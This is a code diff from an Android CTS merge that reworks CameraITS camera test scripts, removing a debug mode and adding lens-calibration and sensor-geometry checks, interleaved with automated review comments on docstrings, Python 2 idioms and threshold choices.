Merge "CP: Add EGL extensions to graphics device info" into nougat-cts-dev
am: 0f9f0a94ad

Change-Id: I656e48e7a1517dddc66e1b323136bed19e38bc0b
diff --git a/OldCtsTestCaseList.mk b/OldCtsTestCaseList.mk
index 685d9a0..c54d283 100644
--- a/OldCtsTestCaseList.mk
+++ b/OldCtsTestCaseList.mk
@@ -15,9 +15,11 @@
 cts_security_apps_list := \
     CtsAppAccessData \
     CtsAppWithData \
+    CtsDeclareNonRuntimePermissions \
     CtsDocumentProvider \
     CtsDocumentClient \
     CtsEncryptionApp \
+    CtsEscalateToRuntimePermissions \
     CtsExternalStorageApp \
     CtsInstrumentationAppDiffCert \
     CtsNetSecPolicyUsesCleartextTrafficFalse \
diff --git a/apps/CameraITS/pymodules/its/caps.py b/apps/CameraITS/pymodules/its/caps.py
index 10586ea..d9270f7 100644
--- a/apps/CameraITS/pymodules/its/caps.py
+++ b/apps/CameraITS/pymodules/its/caps.py
@@ -395,16 +395,56 @@
             in props["android.edge.availableEdgeModes"];
 
 
-def debug_mode():
-    """Returns True/False for whether test is run in debug mode.
+def lens_calibrated(props):
+    """Returns whether lens position is calibrated or not.
+
+    android.lens.info.focusDistanceCalibration has 3 modes.
+    0: Uncalibrated
+    1: Approximate
+    2: Calibrated
+
+    Args:
+        props: Camera properties objects.
 
     Returns:
         Boolean.
     """
-    for s in sys.argv[1:]:
-        if s[:6] == "debug=" and s[6:] == "True":
-            return True
-    return False
+    return props.has_key("android.lens.info.focusDistanceCalibration") and \
+         props["android.lens.info.focusDistanceCalibration"] == 2
+
+
+def lens_approx_calibrated(props):
+    """Returns whether lens position is calibrated or not.
+
+    android.lens.info.focusDistanceCalibration has 3 modes.
+    0: Uncalibrated
+    1: Approximate
+    2: Calibrated
+
+    Args:
+        props: Camera properties objects.
+
+    Returns:
+        Boolean.
+    """
+    return props.has_key("android.lens.info.focusDistanceCalibration") and \
+        (props["android.lens.info.focusDistanceCalibration"] == 1 or
+         props["android.lens.info.focusDistanceCalibration"] == 2)
+
+
+def fixed_focus(props):
+    """Returns whether a device is fixed focus.
+
+    props[android.lens.info.minimumFocusDistance] == 0 is fixed focus
+
+    Args:
+        props: Camera properties objects.
+
+    Returns:
+        Boolean.
+    """
+    return props.has_key("android.lens.info.minimumFocusDistance") and \
+        props["android.lens.info.minimumFocusDistance"] == 0
 
 
 class __UnitTest(unittest.TestCase):
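Review bot: The docstring of `lens_approx_calibrated` is copied unchanged from `lens_calibrated` and still reads "Returns whether lens position is calibrated or not", although the function returns True for mode 1 as well as mode 2. I would change its summary to `"""Returns whether lens position is approximately calibrated or calibrated."""`. All three new helpers call `props.has_key(...)`, which exists only on Python 2 dicts; `"android.lens.info.focusDistanceCalibration" in props` reads the same and is not tied to the interpreter version. The hunk also deletes `debug_mode()`, so any caller not updated in this commit would fail with AttributeError; the callers visible on this page are all removed.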
diff --git a/apps/CameraITS/pymodules/its/image.py b/apps/CameraITS/pymodules/its/image.py
index a5ac60b..f1539ba 100644
--- a/apps/CameraITS/pymodules/its/image.py
+++ b/apps/CameraITS/pymodules/its/image.py
@@ -18,7 +18,7 @@
 import its.error
 import pylab
 import sys
-import Image
+from PIL import Image
 import numpy
 import math
 import unittest
diff --git a/apps/CameraITS/pymodules/its/objects.py b/apps/CameraITS/pymodules/its/objects.py
index 9a68ac2..b2a49aa 100644
--- a/apps/CameraITS/pymodules/its/objects.py
+++ b/apps/CameraITS/pymodules/its/objects.py
@@ -262,39 +262,6 @@
 
     return req, out_spec
 
-
-def get_smallest_yuv_format(props, match_ar=None):
-    """Return a capture request and format spec for the smallest yuv size.
-
-    Args:
-        props: the object returned from its.device.get_camera_properties().
-
-    Returns:
-        fmt:    an output format specification, for the smallest possible yuv
-        format for this device.
-    """
-    size = get_available_output_sizes("yuv", props, match_ar_size=match_ar)[-1]
-    fmt = {"format":"yuv", "width":size[0], "height":size[1]}
-
-    return fmt
-
-
-def get_largest_yuv_format(props):
-    """Return a capture request and format spec for the smallest yuv size.
-
-    Args:
-        props: the object returned from its.device.get_camera_properties().
-
-    Returns:
-        fmt:    an output format specification, for the smallest possible yuv
-        format for this device.
-    """
-    size = get_available_output_sizes("yuv", props)[0]
-    fmt = {"format":"yuv", "width":size[0], "height":size[1]}
-
-    return fmt
-
-
 def get_max_digital_zoom(props):
     """Returns the maximum amount of zooming possible by the camera device.
 
diff --git a/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py b/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py
index 8f4682a..df904aa 100644
--- a/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py
+++ b/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py
@@ -21,7 +21,6 @@
 import matplotlib
 import matplotlib.pyplot as plt
 import math
-import Image
 import time
 import numpy as np
 import scipy.stats
@@ -157,7 +156,7 @@
                         np.var(tile(hp, tile_size), axis=(0, 1)).flatten()
 
                     for (mean, var) in zip(means_tiled, vars_tiled):
-                        # Don't include the tile if it has samples that might 
+                        # Don't include the tile if it has samples that might
                         # be clipped.
                         if mean + 2*math.sqrt(var) < max_signal_level:
                             samples_e.append([mean, var])
@@ -175,7 +174,7 @@
             samples.extend([(round(s), mean, var) for (mean, var) in samples_s])
 
             # Add the linear fit to the plot for this sensitivity.
-            plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'r-', 
+            plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'r-',
                        label="Linear fit")
             xmax = max([x for (x, _) in samples_s])*1.25
             plt_s.set_xlim(xmin=0, xmax=xmax)
@@ -219,7 +218,7 @@
 
         [A, B, C, D], _, _, _ = np.linalg.lstsq(a, b)
 
-        # Plot the noise model components with the values predicted by the 
+        # Plot the noise model components with the values predicted by the
         # noise model.
         S_model = A*sens + B
         O_model = \
@@ -228,14 +227,14 @@
         (fig, (plt_S, plt_O)) = plt.subplots(2, 1)
         plt_S.set_title("Noise model")
         plt_S.set_ylabel("S")
-        plt_S.loglog(sens, S_measured, 'r+', basex=10, basey=10, 
+        plt_S.loglog(sens, S_measured, 'r+', basex=10, basey=10,
                      label="Measured")
         plt_S.loglog(sens, S_model, 'bx', basex=10, basey=10, label="Model")
         plt_S.legend(loc=2)
 
         plt_O.set_xlabel("ISO")
         plt_O.set_ylabel("O")
-        plt_O.loglog(sens, O_measured, 'r+', basex=10, basey=10, 
+        plt_O.loglog(sens, O_measured, 'r+', basex=10, basey=10,
                      label="Measured")
         plt_O.loglog(sens, O_model, 'bx', basex=10, basey=10, label="Model")
         fig.savefig("%s.png" % (NAME))
@@ -246,7 +245,7 @@
             dg = max(s/sens_max_analog, 1)
             S = A*s + B
             O = C*s*s + D*dg*dg
-            plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'b-', 
+            plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'b-',
                        label="Model")
             plt_s.legend(loc=2)
 
diff --git a/apps/CameraITS/tests/scene0/test_metadata.py b/apps/CameraITS/tests/scene0/test_metadata.py
index 94f0412..e5fbba5 100644
--- a/apps/CameraITS/tests/scene0/test_metadata.py
+++ b/apps/CameraITS/tests/scene0/test_metadata.py
@@ -77,6 +77,34 @@
 
     assert(not failed)
 
+    if not its.caps.legacy(props):
+        # Test: pixel_pitch, FOV, and hyperfocal distance are reasonable
+        fmts = props["android.scaler.streamConfigurationMap"]["availableStreamConfigurations"]
+        fmts = sorted(fmts, key=lambda k: k["width"]*k["height"], reverse=True)
+        sensor_size = props["android.sensor.info.physicalSize"]
+        pixel_pitch_h = (sensor_size["height"] / fmts[0]["height"] * 1E3)
+        pixel_pitch_w = (sensor_size["width"] / fmts[0]["width"] * 1E3)
+        print "Assert pixel_pitch WxH: %.2f um, %.2f um" % (pixel_pitch_w,
+                                                            pixel_pitch_h)
+        assert 1.0 <= pixel_pitch_w <= 10
+        assert 1.0 <= pixel_pitch_h <= 10
+        assert 0.333 <= pixel_pitch_w/pixel_pitch_h <= 3.0
+
+        diag = math.sqrt(sensor_size["height"] ** 2 +
+                         sensor_size["width"] ** 2)
+        fl = md["android.lens.focalLength"]
+        fov = 2 * math.degrees(math.atan(diag / (2 * fl)))
+        print "Assert field of view: %.1f degrees" % fov
+        assert 30 <= fov <= 130
+
+        if its.caps.lens_approx_calibrated(props):
+            diopter_hyperfocal = props["android.lens.info.hyperfocalDistance"]
+            if diopter_hyperfocal != 0.0:
+                hyperfocal = 1.0 / diopter_hyperfocal
+                print "Assert hyperfocal distance: %.2f m" % hyperfocal
+                assert 0.02 <= hyperfocal
+
+
 def getval(expr, default=None):
     try:
         return eval(expr)
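Review bot: The pixel-pitch check at the top of the new block divides the physical sensor size by the largest entry of `availableStreamConfigurations`, which is only a proxy for the sensor's pixel count. On a device whose largest stream is smaller than the pixel array, the computed pitch comes out too large and the 1.0 to 10 um asserts can fail for the wrong reason. Reading the dimensions from `props["android.sensor.info.pixelArraySize"]` would avoid that, or a comment should state the assumption. The `fov` line divides by `md["android.lens.focalLength"]` unchecked, so a reported focal length of 0 surfaces as ZeroDivisionError rather than a readable failure; `assert fl > 0` before the division would fix that. The enclosing test function starts before this hunk, and the `math` import that `math.sqrt` needs is not visible here.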
diff --git a/apps/CameraITS/tests/scene1/test_auto_vs_manual.py b/apps/CameraITS/tests/scene1/test_auto_vs_manual.py
index 58d4bdf..a9efa0b 100644
--- a/apps/CameraITS/tests/scene1/test_auto_vs_manual.py
+++ b/apps/CameraITS/tests/scene1/test_auto_vs_manual.py
@@ -37,13 +37,6 @@
                              its.caps.per_frame_control(props))
 
         # Converge 3A and get the estimates.
-        debug = its.caps.debug_mode()
-        largest_yuv = its.objects.get_largest_yuv_format(props)
-        if debug:
-            fmt = largest_yuv
-        else:
-            match_ar = (largest_yuv['width'], largest_yuv['height'])
-            fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
         sens, exp, gains, xform, focus = cam.do_3a(get_results=True)
         xform_rat = its.objects.float_to_rational(xform)
         print "AE sensitivity %d, exposure %dms" % (sens, exp/1000000.0)
@@ -53,7 +46,7 @@
 
         # Auto capture.
         req = its.objects.auto_capture_request()
-        cap_auto = cam.do_capture(req, fmt)
+        cap_auto = cam.do_capture(req)
         img_auto = its.image.convert_capture_to_rgb_image(cap_auto)
         its.image.write_image(img_auto, "%s_auto.jpg" % (NAME))
         xform_a = its.objects.rational_to_float(
@@ -66,7 +59,7 @@
         req = its.objects.manual_capture_request(sens, exp)
         req["android.colorCorrection.transform"] = xform_rat
         req["android.colorCorrection.gains"] = gains
-        cap_man1 = cam.do_capture(req, fmt)
+        cap_man1 = cam.do_capture(req)
         img_man1 = its.image.convert_capture_to_rgb_image(cap_man1)
         its.image.write_image(img_man1, "%s_manual_wb.jpg" % (NAME))
         xform_m1 = its.objects.rational_to_float(
@@ -81,7 +74,7 @@
         req["android.tonemap.curveRed"] = gamma
         req["android.tonemap.curveGreen"] = gamma
         req["android.tonemap.curveBlue"] = gamma
-        cap_man2 = cam.do_capture(req, fmt)
+        cap_man2 = cam.do_capture(req)
         img_man2 = its.image.convert_capture_to_rgb_image(cap_man2)
         its.image.write_image(img_man2, "%s_manual_wb_tm.jpg" % (NAME))
         xform_m2 = its.objects.rational_to_float(
diff --git a/apps/CameraITS/tests/scene1/test_black_white.py b/apps/CameraITS/tests/scene1/test_black_white.py
index e2de71e..68d7de6 100644
--- a/apps/CameraITS/tests/scene1/test_black_white.py
+++ b/apps/CameraITS/tests/scene1/test_black_white.py
@@ -35,14 +35,6 @@
         its.caps.skip_unless(its.caps.manual_sensor(props) and
                              its.caps.per_frame_control(props))
 
-        debug = its.caps.debug_mode()
-        largest_yuv = its.objects.get_largest_yuv_format(props)
-        if debug:
-            fmt = largest_yuv
-        else:
-            match_ar = (largest_yuv['width'], largest_yuv['height'])
-            fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
         expt_range = props['android.sensor.info.exposureTimeRange']
         sens_range = props['android.sensor.info.sensitivityRange']
 
@@ -51,7 +43,7 @@
         print "Black shot: sens = %d, exp time = %.4fms" % (
                 sens_range[0], expt_range[0]/1000000.0)
         req = its.objects.manual_capture_request(sens_range[0], expt_range[0])
-        cap = cam.do_capture(req, fmt)
+        cap = cam.do_capture(req)
         img = its.image.convert_capture_to_rgb_image(cap)
         its.image.write_image(img, "%s_black.jpg" % (NAME))
         tile = its.image.get_image_patch(img, 0.45, 0.45, 0.1, 0.1)
@@ -66,7 +58,7 @@
         print "White shot: sens = %d, exp time = %.2fms" % (
                 sens_range[1], expt_range[1]/1000000.0)
         req = its.objects.manual_capture_request(sens_range[1], expt_range[1])
-        cap = cam.do_capture(req, fmt)
+        cap = cam.do_capture(req)
         img = its.image.convert_capture_to_rgb_image(cap)
         its.image.write_image(img, "%s_white.jpg" % (NAME))
         tile = its.image.get_image_patch(img, 0.45, 0.45, 0.1, 0.1)
diff --git a/apps/CameraITS/tests/scene1/test_ev_compensation_advanced.py b/apps/CameraITS/tests/scene1/test_ev_compensation_advanced.py
index d355cd8..c14f5a9 100644
--- a/apps/CameraITS/tests/scene1/test_ev_compensation_advanced.py
+++ b/apps/CameraITS/tests/scene1/test_ev_compensation_advanced.py
@@ -41,14 +41,6 @@
                              its.caps.per_frame_control(props) and
                              its.caps.ev_compensation(props))
 
-        debug = its.caps.debug_mode()
-        largest_yuv = its.objects.get_largest_yuv_format(props)
-        if debug:
-            fmt = largest_yuv
-        else:
-            match_ar = (largest_yuv['width'], largest_yuv['height'])
-            fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
         ev_compensation_range = props['android.control.aeCompensationRange']
         range_min = ev_compensation_range[0]
         range_max = ev_compensation_range[1]
@@ -77,7 +69,7 @@
             req["android.tonemap.curveRed"] = [0.0,0.0, 1.0,1.0]
             req["android.tonemap.curveGreen"] = [0.0,0.0, 1.0,1.0]
             req["android.tonemap.curveBlue"] = [0.0,0.0, 1.0,1.0]
-            caps = cam.do_capture([req]*THREASH_CONVERGE_FOR_EV, fmt)
+            caps = cam.do_capture([req]*THREASH_CONVERGE_FOR_EV)
 
             for cap in caps:
                 if (cap['metadata']['android.control.aeState'] == LOCKED):
diff --git a/apps/CameraITS/tests/scene1/test_ev_compensation_basic.py b/apps/CameraITS/tests/scene1/test_ev_compensation_basic.py
index 9992667..cb69607 100644
--- a/apps/CameraITS/tests/scene1/test_ev_compensation_basic.py
+++ b/apps/CameraITS/tests/scene1/test_ev_compensation_basic.py
@@ -41,14 +41,6 @@
         its.caps.skip_unless(its.caps.ev_compensation(props) and
                              its.caps.ae_lock(props))
 
-        debug = its.caps.debug_mode()
-        largest_yuv = its.objects.get_largest_yuv_format(props)
-        if debug:
-            fmt = largest_yuv
-        else:
-            match_ar = (largest_yuv['width'], largest_yuv['height'])
-            fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
         ev_per_step = its.objects.rational_to_float(
                 props['android.control.aeCompensationStep'])
         steps_per_ev = int(1.0 / ev_per_step)
@@ -69,7 +61,7 @@
             req = its.objects.auto_capture_request()
             req['android.control.aeExposureCompensation'] = ev
             req["android.control.aeLock"] = True
-            caps = cam.do_capture([req]*THRESH_CONVERGE_FOR_EV, fmt)
+            caps = cam.do_capture([req]*THRESH_CONVERGE_FOR_EV)
             for cap in caps:
                 if (cap['metadata']['android.control.aeState'] == LOCKED):
                     y = its.image.convert_capture_to_planes(cap)[0]
diff --git a/apps/CameraITS/tests/scene1/test_exposure.py b/apps/CameraITS/tests/scene1/test_exposure.py
index e5c23c8..a70f357 100644
--- a/apps/CameraITS/tests/scene1/test_exposure.py
+++ b/apps/CameraITS/tests/scene1/test_exposure.py
@@ -51,14 +51,6 @@
         its.caps.skip_unless(its.caps.compute_target_exposure(props) and
                              its.caps.per_frame_control(props))
 
-        debug = its.caps.debug_mode()
-        largest_yuv = its.objects.get_largest_yuv_format(props)
-        if debug:
-            fmt = largest_yuv
-        else:
-            match_ar = (largest_yuv['width'], largest_yuv['height'])
-            fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
         e,s = its.target.get_target_exposure_combos(cam)["minSensitivity"]
         s_e_product = s*e
         expt_range = props['android.sensor.info.exposureTimeRange']
@@ -70,9 +62,8 @@
             s_test = round(s*m)
             e_test = s_e_product / s_test
             print "Testing s:", s_test, "e:", e_test
-            req = its.objects.manual_capture_request(
-                    s_test, e_test, True, props)
-            cap = cam.do_capture(req, fmt)
+            req = its.objects.manual_capture_request(s_test, e_test, True, props)
+            cap = cam.do_capture(req)
             s_res = cap["metadata"]["android.sensor.sensitivity"]
             e_res = cap["metadata"]["android.sensor.exposureTime"]
             assert(0 <= s_test - s_res < s_test * THRESHOLD_ROUND_DOWN_GAIN)
diff --git a/apps/CameraITS/tests/scene1/test_format_combos.py b/apps/CameraITS/tests/scene1/test_format_combos.py
index 1519237..1b40826 100644
--- a/apps/CameraITS/tests/scene1/test_format_combos.py
+++ b/apps/CameraITS/tests/scene1/test_format_combos.py
@@ -38,7 +38,6 @@
 
         successes = []
         failures = []
-        debug = its.caps.debug_mode()
 
         # Two different requests: auto, and manual.
         e, s = its.target.get_target_exposure_combos(cam)["midExposureTime"]
@@ -90,8 +89,7 @@
                         for c,cap in enumerate(caps):
                             img = its.image.convert_capture_to_rgb_image(cap,
                                     props=props)
-                            if debug:
-                                its.image.write_image(img,
+                            its.image.write_image(img,
                                     "%s_n%02d_r%d_f%d_b%d_c%d.jpg"%(NAME,n,r,f,b,c))
 
                     except Exception as e:
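Review bot: With the `if debug:` guard removed, `its.image.write_image` now runs for every capture in the innermost loop, writing one JPEG per n/r/f/b/c combination on every run. Nothing in the hunk shows the pass/fail result depending on those files, so this presumably adds run time and disk use only to keep artifacts for triage. A comment such as `# Always save captures so failures can be inspected afterwards.` would record that intent. The same unconditional write is introduced in `measure_aspect_ratio` in test_aspect_ratio_and_crop.py. The loop and the `try` block start outside this hunk.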
diff --git a/apps/CameraITS/tests/scene1/test_linearity.py b/apps/CameraITS/tests/scene1/test_linearity.py
index 9de1af3..2176f5e 100644
--- a/apps/CameraITS/tests/scene1/test_linearity.py
+++ b/apps/CameraITS/tests/scene1/test_linearity.py
@@ -50,14 +50,6 @@
         its.caps.skip_unless(its.caps.compute_target_exposure(props) and
                              its.caps.per_frame_control(props))
 
-        debug = its.caps.debug_mode()
-        largest_yuv = its.objects.get_largest_yuv_format(props)
-        if debug:
-            fmt = largest_yuv
-        else:
-            match_ar = (largest_yuv['width'], largest_yuv['height'])
-            fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
         e,s = its.target.get_target_exposure_combos(cam)["midSensitivity"]
         s /= 2
         sens_range = props['android.sensor.info.sensitivityRange']
@@ -78,7 +70,7 @@
 
         for sens in sensitivities:
             req["android.sensor.sensitivity"] = sens
-            cap = cam.do_capture(req, fmt)
+            cap = cam.do_capture(req)
             img = its.image.convert_capture_to_rgb_image(cap)
             its.image.write_image(
                     img, "%s_sens=%04d.jpg" % (NAME, sens))
diff --git a/apps/CameraITS/tests/scene1/test_locked_burst.py b/apps/CameraITS/tests/scene1/test_locked_burst.py
index 5308010..daefb6b 100644
--- a/apps/CameraITS/tests/scene1/test_locked_burst.py
+++ b/apps/CameraITS/tests/scene1/test_locked_burst.py
@@ -44,8 +44,6 @@
         # Converge 3A prior to capture.
         cam.do_3a(do_af=True, lock_ae=True, lock_awb=True)
 
-        fmt = its.objects.get_largest_yuv_format(props)
-
         # After 3A has converged, lock AE+AWB for the duration of the test.
         req = its.objects.fastest_auto_capture_request(props)
         req["android.control.awbLock"] = True
@@ -56,7 +54,7 @@
         r_means = []
         g_means = []
         b_means = []
-        caps = cam.do_capture([req]*BURST_LEN, fmt)
+        caps = cam.do_capture([req]*BURST_LEN)
         for i,cap in enumerate(caps):
             img = its.image.convert_capture_to_rgb_image(cap)
             its.image.write_image(img, "%s_frame%d.jpg"%(NAME,i))
diff --git a/apps/CameraITS/tests/scene1/test_param_color_correction.py b/apps/CameraITS/tests/scene1/test_param_color_correction.py
index 86ea708..09b3707 100644
--- a/apps/CameraITS/tests/scene1/test_param_color_correction.py
+++ b/apps/CameraITS/tests/scene1/test_param_color_correction.py
@@ -41,14 +41,6 @@
                              its.caps.per_frame_control(props))
 
         # Baseline request
-        debug = its.caps.debug_mode()
-        largest_yuv = its.objects.get_largest_yuv_format(props)
-        if debug:
-            fmt = largest_yuv
-        else:
-            match_ar = (largest_yuv['width'], largest_yuv['height'])
-            fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
         e, s = its.target.get_target_exposure_combos(cam)["midSensitivity"]
         req = its.objects.manual_capture_request(s, e, True, props)
         req["android.colorCorrection.mode"] = 0
@@ -78,7 +70,7 @@
         for i in range(len(transforms)):
             req["android.colorCorrection.transform"] = transforms[i]
             req["android.colorCorrection.gains"] = gains[i]
-            cap = cam.do_capture(req, fmt)
+            cap = cam.do_capture(req)
             img = its.image.convert_capture_to_rgb_image(cap)
             its.image.write_image(img, "%s_req=%d.jpg" % (NAME, i))
             tile = its.image.get_image_patch(img, 0.45, 0.45, 0.1, 0.1)
diff --git a/apps/CameraITS/tests/scene1/test_param_exposure_time.py b/apps/CameraITS/tests/scene1/test_param_exposure_time.py
index e77119f..0c0aab1 100644
--- a/apps/CameraITS/tests/scene1/test_param_exposure_time.py
+++ b/apps/CameraITS/tests/scene1/test_param_exposure_time.py
@@ -37,18 +37,10 @@
         its.caps.skip_unless(its.caps.compute_target_exposure(props) and
                              its.caps.per_frame_control(props))
 
-        debug = its.caps.debug_mode()
-        largest_yuv = its.objects.get_largest_yuv_format(props)
-        if debug:
-            fmt = largest_yuv
-        else:
-            match_ar = (largest_yuv['width'], largest_yuv['height'])
-            fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
         e,s = its.target.get_target_exposure_combos(cam)["midExposureTime"]
         for i,e_mult in enumerate([0.8, 0.9, 1.0, 1.1, 1.2]):
             req = its.objects.manual_capture_request(s, e * e_mult, True, props)
-            cap = cam.do_capture(req, fmt)
+            cap = cam.do_capture(req)
             img = its.image.convert_capture_to_rgb_image(cap)
             its.image.write_image(
                     img, "%s_frame%d.jpg" % (NAME, i))
diff --git a/apps/CameraITS/tests/scene1/test_param_flash_mode.py b/apps/CameraITS/tests/scene1/test_param_flash_mode.py
index 9a87b88..38f864f 100644
--- a/apps/CameraITS/tests/scene1/test_param_flash_mode.py
+++ b/apps/CameraITS/tests/scene1/test_param_flash_mode.py
@@ -37,21 +37,13 @@
         # Manually set the exposure to be a little on the dark side, so that
         # it should be obvious whether the flash fired or not, and use a
         # linear tonemap.
-        debug = its.caps.debug_mode()
-        largest_yuv = its.objects.get_largest_yuv_format(props)
-        if debug:
-            fmt = largest_yuv
-        else:
-            match_ar = (largest_yuv['width'], largest_yuv['height'])
-            fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
         e, s = its.target.get_target_exposure_combos(cam)["midExposureTime"]
         e /= 4
         req = its.objects.manual_capture_request(s, e, True, props)
 
         for f in [0,1,2]:
             req["android.flash.mode"] = f
-            cap = cam.do_capture(req, fmt)
+            cap = cam.do_capture(req)
             flash_modes_reported.append(cap["metadata"]["android.flash.mode"])
             flash_states_reported.append(cap["metadata"]["android.flash.state"])
             img = its.image.convert_capture_to_rgb_image(cap)
diff --git a/apps/CameraITS/tests/scene1/test_param_sensitivity.py b/apps/CameraITS/tests/scene1/test_param_sensitivity.py
index 32b764d..d6b44a2 100644
--- a/apps/CameraITS/tests/scene1/test_param_sensitivity.py
+++ b/apps/CameraITS/tests/scene1/test_param_sensitivity.py
@@ -39,14 +39,6 @@
         its.caps.skip_unless(its.caps.compute_target_exposure(props) and
                              its.caps.per_frame_control(props))
 
-        debug = its.caps.debug_mode()
-        largest_yuv = its.objects.get_largest_yuv_format(props)
-        if debug:
-            fmt = largest_yuv
-        else:
-            match_ar = (largest_yuv['width'], largest_yuv['height'])
-            fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
         expt,_ = its.target.get_target_exposure_combos(cam)["midSensitivity"]
         sens_range = props['android.sensor.info.sensitivityRange']
         sens_step = (sens_range[1] - sens_range[0]) / float(NUM_STEPS-1)
@@ -54,7 +46,7 @@
 
         for s in sensitivities:
             req = its.objects.manual_capture_request(s, expt)
-            cap = cam.do_capture(req, fmt)
+            cap = cam.do_capture(req)
             img = its.image.convert_capture_to_rgb_image(cap)
             its.image.write_image(
                     img, "%s_iso=%04d.jpg" % (NAME, s))
diff --git a/apps/CameraITS/tests/scene1/test_param_tonemap_mode.py b/apps/CameraITS/tests/scene1/test_param_tonemap_mode.py
index 1229f90..8c8e626 100644
--- a/apps/CameraITS/tests/scene1/test_param_tonemap_mode.py
+++ b/apps/CameraITS/tests/scene1/test_param_tonemap_mode.py
@@ -41,14 +41,6 @@
         its.caps.skip_unless(its.caps.compute_target_exposure(props) and
                              its.caps.per_frame_control(props))
 
-        debug = its.caps.debug_mode()
-        largest_yuv = its.objects.get_largest_yuv_format(props)
-        if debug:
-            fmt = largest_yuv
-        else:
-            match_ar = (largest_yuv['width'], largest_yuv['height'])
-            fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
         e, s = its.target.get_target_exposure_combos(cam)["midExposureTime"]
         e /= 2
 
@@ -68,7 +60,7 @@
                     sum([[i/LM1, min(1.0,(1+1.0*n)*i/LM1)] for i in range(L)], []))
             req["android.tonemap.curveBlue"] = (
                     sum([[i/LM1, min(1.0,(1+1.5*n)*i/LM1)] for i in range(L)], []))
-            cap = cam.do_capture(req, fmt)
+            cap = cam.do_capture(req)
             img = its.image.convert_capture_to_rgb_image(cap)
             its.image.write_image(
                     img, "%s_n=%d.jpg" %(NAME, n))
diff --git a/apps/CameraITS/tests/scene1/test_tonemap_sequence.py b/apps/CameraITS/tests/scene1/test_tonemap_sequence.py
index 465ef30..54d3d65 100644
--- a/apps/CameraITS/tests/scene1/test_tonemap_sequence.py
+++ b/apps/CameraITS/tests/scene1/test_tonemap_sequence.py
@@ -26,7 +26,7 @@
 
     # There should be 3 identical frames followed by a different set of
     # 3 identical frames.
-    MAX_SAME_DELTA = 0.03  # match number in test_burst_sameness_manual
+    MAX_SAME_DELTA = 0.015
     MIN_DIFF_DELTA = 0.10
 
     with its.device.ItsSession() as cam:
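Review bot: `MAX_SAME_DELTA` is halved from 0.03 to 0.015 and the comment that tied the old value to test_burst_sameness_manual is dropped, so the new threshold has no stated origin. A tighter tolerance makes the "3 identical frames" check more sensitive to frame-to-frame noise, and the next person tuning it has nothing to go on. A trailing comment naming the test or measurement that 0.015 was derived from would keep it maintainable. If the two tests are still meant to share the limit, the old cross-reference should be restored.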
@@ -35,22 +35,14 @@
                              its.caps.manual_post_proc(props) and
                              its.caps.per_frame_control(props))
 
-        debug = its.caps.debug_mode()
-        largest_yuv = its.objects.get_largest_yuv_format(props)
-        if debug:
-            fmt = largest_yuv
-        else:
-            match_ar = (largest_yuv['width'], largest_yuv['height'])
-            fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
-        sens, exp_time, _,_,f_dist = cam.do_3a(do_af=True,get_results=True)
+        sens, exp_time, _,_,_ = cam.do_3a(do_af=False,get_results=True)
 
         means = []
 
         # Capture 3 manual shots with a linear tonemap.
         req = its.objects.manual_capture_request(sens, exp_time, True, props)
         for i in [0,1,2]:
-            cap = cam.do_capture(req, fmt)
+            cap = cam.do_capture(req)
             img = its.image.convert_capture_to_rgb_image(cap)
             its.image.write_image(img, "%s_i=%d.jpg" % (NAME, i))
             tile = its.image.get_image_patch(img, 0.45, 0.45, 0.1, 0.1)
@@ -59,7 +51,7 @@
         # Capture 3 manual shots with the default tonemap.
         req = its.objects.manual_capture_request(sens, exp_time, False)
         for i in [3,4,5]:
-            cap = cam.do_capture(req, fmt)
+            cap = cam.do_capture(req)
             img = its.image.convert_capture_to_rgb_image(cap)
             its.image.write_image(img, "%s_i=%d.jpg" % (NAME, i))
             tile = its.image.get_image_patch(img, 0.45, 0.45, 0.1, 0.1)
diff --git a/apps/CameraITS/tests/scene4/test_aspect_ratio_and_crop.py b/apps/CameraITS/tests/scene4/test_aspect_ratio_and_crop.py
index 9642061..8ff7f73 100644
--- a/apps/CameraITS/tests/scene4/test_aspect_ratio_and_crop.py
+++ b/apps/CameraITS/tests/scene4/test_aspect_ratio_and_crop.py
@@ -77,7 +77,6 @@
         run_crop_test = (level3_device or full_device) and raw_avlb
         if not run_crop_test:
             print "Crop test skipped"
-        debug = its.caps.debug_mode()
         # Converge 3A and get the estimates.
         sens, exp, gains, xform, focus = cam.do_3a(get_results=True,
                                                    lock_ae=True, lock_awb=True)
@@ -105,8 +104,7 @@
             img_name = "%s_%s_w%d_h%d.png" \
                        % (NAME, "raw", size_raw[1], size_raw[0])
             aspect_ratio_gt, cc_ct_gt, circle_size_raw = measure_aspect_ratio(
-                                                         img_raw, 1, img_name,
-                                                         debug)
+                                                         img_raw, 1, img_name)
             # Normalize the circle size to 1/4 of the image size, so that
             # circle size won"t affect the crop test result
             factor_cp_thres = (min(size_raw[0:1])/4.0) / max(circle_size_raw)
@@ -156,9 +154,8 @@
                 img = its.image.convert_capture_to_rgb_image(frm_iter)
                 img_name = "%s_%s_with_%s_w%d_h%d.png" \
                            % (NAME, fmt_iter, fmt_cmpr, w_iter, h_iter)
-                aspect_ratio, cc_ct, (cc_w, cc_h) = \
-                        measure_aspect_ratio(img, raw_avlb, img_name,
-                                             debug)
+                aspect_ratio, cc_ct, _ = measure_aspect_ratio(img, raw_avlb,
+                                                              img_name)
                 # check pass/fail for aspect ratio
                 # image size >= LARGE_SIZE: use THRES_L_AR_TEST
                 # image size == 0 (extreme case): THRES_XS_AR_TEST
@@ -237,7 +234,7 @@
